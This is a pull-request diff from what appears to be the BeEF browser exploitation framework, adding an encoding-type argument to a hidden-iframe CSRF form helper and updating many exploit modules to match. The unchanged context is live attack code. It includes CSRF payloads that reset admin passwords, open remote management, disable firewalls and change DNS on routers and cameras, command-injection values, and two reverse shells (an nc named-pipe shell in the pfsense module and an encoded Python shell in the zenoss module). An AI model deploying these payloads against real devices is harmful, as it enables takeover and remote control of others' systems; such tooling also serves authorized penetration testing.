Merge pull request #961 from bcoles/createIframeXsrfForm_enctype

Add encoding type argument 'enctype' to 'createIframeXsrfForm()'

core/main/client/dom.js

@@ -446,15 +446,17 @@ beef.dom = {
      * Create an invisible iFrame with a form inside, and submit it. Useful for XSRF attacks delivered via POST requests.
      * @params: {String} action: the form action attribute, where the request will be sent.
      * @params: {String} method: HTTP method, usually POST.
+     * @params: {String} enctype: form encoding type
      * @params: {Array} inputs: an array of inputs to be added to the form (type, name, value).
      *         example: [{'type':'hidden', 'name':'1', 'value':''} , {'type':'hidden', 'name':'2', 'value':'3'}]
      */
-    createIframeXsrfForm: function(action, method, inputs){
+    createIframeXsrfForm: function(action, method, enctype, inputs){
         var iframeXsrf = beef.dom.createInvisibleIframe();
 
         var formXsrf = document.createElement('form');
-        formXsrf.setAttribute('action', action);
-        formXsrf.setAttribute('method', method);
+        formXsrf.setAttribute('action',  action);
+        formXsrf.setAttribute('method',  method);
+        formXsrf.setAttribute('enctype', enctype);
 
         var input = null;
         for (i in inputs){

modules/exploits/axous_1_1_1_add_user_csrf/command.js

@@ -10,7 +10,7 @@ beef.execute(function() {
 	var password = '<%= @password %>';
 	var email    = '<%= @email %>';
 
-	var axous_iframe = beef.dom.createIframeXsrfForm(base, "POST", [
+	var axous_iframe = beef.dom.createIframeXsrfForm(base, "POST", "application/x-www-form-urlencoded", [
 		{'type':'hidden', 'name':'user_name',   'value':username},
 		{'type':'hidden', 'name':'new_passwd',  'value':password},
 		{'type':'hidden', 'name':'new_passwd1', 'value':password},

modules/exploits/boastmachine_3_1_add_user_csrf/command.js

@@ -10,7 +10,7 @@ beef.execute(function() {
 	var password = '<%= @password %>';
 	var email    = '<%= @email %>';
 
-	var boastmachine_iframe = beef.dom.createIframeXsrfForm(base, "POST", [
+	var boastmachine_iframe = beef.dom.createIframeXsrfForm(base, "POST", "application/x-www-form-urlencoded", [
 		{'type':'hidden', 'name':'action',     'value':'add_user'},
 		{'type':'hidden', 'name':'do',         'value':'add'},
 		{'type':'hidden', 'name':'user_login', 'value':username},

modules/exploits/camera/airlive_ip_camera_csrf/command.js

@@ -10,7 +10,7 @@ beef.execute(function() {
   var user  = '<%= @user %>';
   var pass  = '<%= @pass %>';
 
-  var airlive_ip_camera_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(base + path, "GET",
+  var airlive_ip_camera_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(base + path, "GET", "application/x-www-form-urlencoded",
     [{'type':'hidden', 'name':'user',     'value':user},
      {'type':'hidden', 'name':'pwd',      'value':pass},
      {'type':'hidden', 'name':'grp',      'value':'administrator'},

modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js

@@ -9,7 +9,7 @@ beef.execute(function() {
   var path    = 'adm/file.cgi';
   var passwd  = '<%= @password %>';
 
-  var linksys_wvc_iframe = beef.dom.createIframeXsrfForm(gateway + path, "POST",
+  var linksys_wvc_iframe = beef.dom.createIframeXsrfForm(gateway + path, "POST", "application/x-www-form-urlencoded",
     [{'type':'hidden', 'name':'adm',            'value':'admin'},
      {'type':'hidden', 'name':'admpw',          'value':passwd},
      {'type':'hidden', 'name':'admpwv',         'value':passwd},

modules/exploits/nas/dlink_sharecenter_cmd_exec/command.js

@@ -11,7 +11,7 @@ beef.execute(function() {
 	var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
 	var timeout = 15;
 
-	var dlink_sharecenter_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
+	var dlink_sharecenter_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", "application/x-www-form-urlencoded", [
 		{'type':'hidden', 'name':'cmd',      'value':'cgi_sms_test'},
 		{'type':'hidden', 'name':'command1', 'value':cmd}
 	]);

modules/exploits/opencart_reset_password/command.js

@@ -8,7 +8,7 @@ beef.execute(function() {
   var base     = '<%= @base %>'; 
   var password = '<%= @password %>';
 
-  var opencart_reset_password_iframe = beef.dom.createIframeXsrfForm(base, "POST", [
+  var opencart_reset_password_iframe = beef.dom.createIframeXsrfForm(base, "POST", "application/x-www-form-urlencoded", [
     {'type':'hidden', 'name':'password', 'value':password},
     {'type':'hidden', 'name':'confirm',  'value':password}
   ]);

modules/exploits/pfsense/command.js

@@ -10,7 +10,7 @@ beef.execute(function() {
   var lhost = '<%= @lhost %>';
   var lport = '<%= @lport %>';
 
-  var pfsense_iframe = beef.dom.createIframeXsrfForm("https://" + rhost + ":" + rport +"/system_firmware.php", "POST",
+  var pfsense_iframe = beef.dom.createIframeXsrfForm("https://" + rhost + ":" + rport +"/system_firmware.php", "POST", "application/x-www-form-urlencoded",
     [{'type':'hidden', 'name':'kerneltype', 'value':'SMP > /boot/kernel/pfsense_kernel.txt;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ' + lhost + ' ' + lport + ' >/tmp/f &'}]);
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

modules/exploits/router/3com_officeconnect_cmd_exec/command.js

@@ -11,7 +11,7 @@ beef.execute(function() {
 	var cmd     = '<%= @cmd %>';
 	var timeout = 15;
 
-	var com_officeconnect_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
+	var com_officeconnect_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", "application/x-www-form-urlencoded", [
 		{'type':'hidden', 'name':'testType', 'value':'1'},
 		{'type':'hidden', 'name':'IP',       'value':'||'+cmd}
 	]);

modules/exploits/router/actiontec_q1000_csrf/command.js

@@ -12,7 +12,7 @@ beef.execute(function() {
 	var port    = '<%= @port %>';
 	var timeout = 15;
 
-	var actiontec_q1000_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotegui.cgi", "POST", [
+	var actiontec_q1000_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotegui.cgi", "POST", "application/x-www-form-urlencoded", [
 		{'type':'hidden', 'name':'serCtlHttp',          'value':'1'},
 		{'type':'hidden', 'name':'adminUserName',       'value':user},
 		{'type':'hidden', 'name':'adminPassword',       'value':passwd},
@@ -20,7 +20,7 @@ beef.execute(function() {
 		{'type':'hidden', 'name':'remGuiPort',          'value':port}
 	]);
 
-	var actiontec_q1000_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotetelnet.cgi", "POST", [
+	var actiontec_q1000_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotetelnet.cgi", "POST", "application/x-www-form-urlencoded", [
 		{'type':'hidden', 'name':'serCtlTelnet',        'value':'1'},
 		{'type':'hidden', 'name':'remTelUser',          'value':user},
 		{'type':'hidden', 'name':'remTelPass',          'value':passwd},
@@ -28,12 +28,12 @@ beef.execute(function() {
 		{'type':'hidden', 'name':'remTelPassChanged',   'value':'1'}
 	]);
 
-	var actiontec_q1000_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_firewallsettings.cgi", "POST", [
+	var actiontec_q1000_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_firewallsettings.cgi", "POST", "application/x-www-form-urlencoded", [
 		{'type':'hidden', 'name':'fwLevel',             'value':'Basic'},
 		{'type':'hidden', 'name':'fwStealthMode',       'value':'0'}
 	]);
 
-	var actiontec_q1000_iframe4_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "ipv6_firewallsettings.cgi", "POST", [
+	var actiontec_q1000_iframe4_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "ipv6_firewallsettings.cgi", "POST", "application/x-www-form-urlencoded", [
 		{'type':'hidden', 'name':'ipv6_fwlevel',        'value':'basic'},
 		{'type':'hidden', 'name':'ipv6_fwenable',       'value':'0'}
 	]);

modules/exploits/router/belkin_dns_csrf/command.js

@@ -41,7 +41,7 @@ beef.execute(function() {
 	document.body.appendChild(img);
 
 	// change DNS
-	var belkin_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "POST", [
+	var belkin_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "POST", "application/x-www-form-urlencoded", [
 		{'type':'hidden', 'name':'dns1_1',   'value':dns_1},
 		{'type':'hidden', 'name':'dns1_2',   'value':dns_2},
 		{'type':'hidden', 'name':'dns1_3',   'value':dns_3},

modules/exploits/router/bt_home_hub_csrf/command.js

@@ -9,7 +9,7 @@ beef.execute(function() {
   var passwd  = '<%= @password %>';
   var timeout = 15;
 
-  var bt_home_hub_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST", [
+  var bt_home_hub_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST", "application/x-www-form-urlencoded", [
     {'type':'hidden', 'name':'0',  'value':'31'} ,
     {'type':'hidden', 'name':'1',  'value':''},
     {'type':'hidden', 'name':'30', 'value':passwd}

modules/exploits/router/cisco_e2400_csrf/command.js

@@ -9,7 +9,7 @@ beef.execute(function() {
   var passwd  = '<%= @password %>';
   var timeout = 15;
 
-  var cisco_e2400_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
+  var cisco_e2400_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", "application/x-www-form-urlencoded",
       [
        {'type':'hidden', 'name':'submit_button',     'value':'Management'},
        {'type':'hidden', 'name':'change_action',     'value':''},
@@ -38,7 +38,7 @@ beef.execute(function() {
        {'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'},
       ]);
 
-  var cisco_e2400_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
+  var cisco_e2400_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", "application/x-www-form-urlencoded",
       [
        {'type':'hidden', 'name':'submit_button',       'value':'Firewall'},
        {'type':'hidden', 'name':'change_action',       'value':''},

modules/exploits/router/dlink_dir_615_csrf/command.js

@@ -9,7 +9,7 @@ beef.execute(function() {
   var passwd  = '<%= @password %>';
   var timeout = 15;
 
-  var dir615_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST",
+  var dir615_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST", "application/x-www-form-urlencoded",
       [{'type':'hidden', 'name':'ACTION_POST',     'value':'1'} ,
        {'type':'hidden', 'name':'apply',           'value':'Save Settings'},
        {'type':'hidden', 'name':'admin_name',      'value':'admin'},

modules/exploits/router/dlink_dsl500t_csrf/command.js

@@ -9,7 +9,7 @@ beef.execute(function() {
   var passwd  = '<%= @password %>';
   var timeout = 15;
 
-  var dsl500t_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
+  var dsl500t_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST", "application/x-www-form-urlencoded",
       [{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
        {'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
        {'type':'hidden', 'name':'security:settings/password', 'value':passwd},

modules/exploits/router/linksys_wrt54g2_csrf/command.js

@@ -10,7 +10,7 @@ beef.execute(function() {
   var passwd  = '<%= @password %>';
   var timeout = 15;
 
-  var wrt54g2_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST",
+  var wrt54g2_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST", "application/x-www-form-urlencoded",
       [{'type':'hidden', 'name':'MANAGE_USE_HTTP', 'value':'0'} ,
        {'type':'hidden', 'name':'MANAGE_HTTP', 'value':'1'},
        {'type':'hidden', 'name':'MANAGE_HTTP_S', 'value':'0'},

modules/exploits/router/linksys_wrt54g_csrf/command.js

@@ -10,7 +10,7 @@ beef.execute(function() {
   var passwd  = '<%= @password %>';
   var timeout = 15;
 
-  var wrt54g_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST",
+  var wrt54g_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST", "application/x-www-form-urlencoded",
       [
           {'type':'hidden', 'name':'remote_mgt_https',   'value':'0'} ,
           {'type':'hidden', 'name':'http_enable',        'value':'1'},

modules/exploits/router/virgin_superhub_csrf/command.js

@@ -11,17 +11,17 @@ beef.execute(function() {
 	var port    = '<%= @port %>';
 	var timeout = 15;
 
-	var virgin_superhub_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
+	var virgin_superhub_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", "application/x-www-form-urlencoded", [
 		{'type':'hidden', 'name':'NetgearPassword',        'value':passwd},
 		{'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
 		{'type':'hidden', 'name':'RestoreFactoryNo',       'value':'0x00'}
 	]);
 
-	var virgin_superhub_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
+	var virgin_superhub_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", "application/x-www-form-urlencoded", [
 		{'type':'hidden', 'name':'cbPortScanDetection',    'value':''}
 	]);
 
-	var virgin_superhub_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
+	var virgin_superhub_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", "application/x-www-form-urlencoded", [
 		{'type':'hidden', 'name':'NetgearVMRmEnable',      'value':'0x01'},
 		{'type':'hidden', 'name':'NetgearVMRmPortNumber',  'value':port}
 	]);

modules/exploits/wifi_pineapple_csrf/command.js

@@ -9,7 +9,7 @@ beef.execute(function() {
   var passwd  = '<%= @password %>';
   var timeout = 15;
 
-  var wifi_pineapple_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "/components/system/configuration/functions.php?change_password", "POST", [
+  var wifi_pineapple_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "/components/system/configuration/functions.php?change_password", "POST", "application/x-www-form-urlencoded", [
     {'type':'hidden', 'name':'password',  'value':passwd} ,
     {'type':'hidden', 'name':'repeat',    'value':passwd},
     {'type':'hidden', 'name':'change_password', 'value':'Change Password'}

modules/exploits/zenoss_3x_command_execution/command.js

@@ -17,7 +17,7 @@ beef.execute(function() {
   var payload = unescape('%70%79%74%68%6f%6e%20%2d%63%20%22%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%68%6f%73%74%3d%5c%22'+lhost+'%5c%22%3b%70%6f%72%74%3d'+lport+'%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%68%6f%73%74%2c%70%6f%72%74%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%5c%22%2f%62%69%6e%2f%73%68%5c%22%2c%5c%22%2d%69%5c%22%5d%29%3b%22')
 
   // send request
-  var zenoss_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "POST", [
+  var zenoss_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "POST", "application/x-www-form-urlencoded", [
     {'type':'hidden', 'name':'__ac_name',     'value':user},
     {'type':'hidden', 'name':'__ac_password', 'value':pass},
     {'type':'hidden', 'name':'daemon',        'value':payload}